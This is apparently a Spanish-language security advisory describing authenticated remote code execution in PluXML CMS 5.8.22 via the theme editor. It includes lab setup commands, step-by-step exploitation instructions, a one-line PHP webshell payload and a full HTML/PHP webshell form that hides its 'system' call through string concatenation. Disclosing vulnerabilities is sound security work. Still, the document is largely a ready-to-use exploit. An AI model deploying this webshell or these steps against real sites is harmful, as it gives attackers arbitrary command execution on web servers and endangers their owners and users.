
Se ha identificado una vulnerabilidad crítica de ejecución remota de código (RCE) en PluXML CMS versión 5.8.22. Esta vulnerabilidad permite a administradores autenticados ejecutar código PHP arbitrario en el servidor web mediante la subida de webshells PHP maliciosas a través de la funcionalidad del editor de temas.
git clone https://github.com/pluxml/PluXml.git
cd PluXml
ddev config --project-type=php --php-version=8.1 --docroot=.
ddev start
Explotación paso a paso
Autenticación: inicie sesión en el panel de administración de PluXML con credenciales de administrador válidas Navegue al editor de temas:
Acceda al panel de administración
Navegue a: Temas → Home.php → Editar

Inyecte el payload malicioso:
Reemplace el contenido existente en home.php con una webshell en PHP
Ejemplo de payload: <?php system($_GET['cmd']); ?>
Guarde el archivo modificado
Desencadene la ejecución:
Visite la página de inicio principal del sitio web El código PHP inyectado se ejecuta con los privilegios del servidor web
Reverse Shell
Payload de la webshell
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input
type="TEXT"
name="cmd"
autofocus
id="cmd"
size="80"
>
<input
type="SUBMIT"
value="Execute"
>
</form>
<pre>
<?php
if (isset($_GET['cmd'])) {
$func_name = "sys" . "tem";
$func_name($_GET['cmd']);
}
?>
</pre>
</body>
</html>